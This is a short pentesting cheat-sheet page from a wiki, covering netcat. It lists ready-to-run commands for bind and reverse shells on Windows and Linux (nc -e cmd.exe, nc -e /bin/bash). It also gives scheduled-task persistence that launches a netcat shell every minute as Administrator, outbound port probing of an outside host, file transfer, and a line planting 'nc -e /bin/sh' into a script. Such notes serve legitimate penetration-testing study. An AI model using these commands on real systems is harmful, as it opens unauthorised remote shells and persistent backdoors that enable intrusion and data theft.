NETCAT

From BHaFSec Pentesting Notes Wiki

Shell from windows to linux

root@kali:~# nc -nv a.b.c.d 4444
c:\User\offsec>nc -nlvp 4444 -e cmd.exe

Shell from linux to windows

root@kali:~# nc -nlvp 4444 -e /bin/bash
c:\User\offsec>nc -nv a.b.c.d 4444

Schedule with AT

at 0:19 "nc.exe -v <IP> <PORT> -d -e cmd.exe"

or

echo nc.exe -v <IP> <PORT> -L -d -e cmd.exe >c:\netcat.cmd
schtasks /create /tn rb /tr "c:\netcat.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""

Check outbound ports

for /L %i in (1,1,1024) do @nc.exe -z -v open.zorinaq.com %i | findstr "Yep"


Fileserver

nc -q1 -lvp 1234 < file.txt
nc <IPADDRESS> 1234 > output.txt  # to retrieve the file from the remote host.

Misc

echo "nc -e /bin/sh <IPADDRESS> <PORT>" >> /tmp/run
printf "HEAD / HTTP/1.0\r\n\r\n" |nc -n -i 1 192.168.13.219 80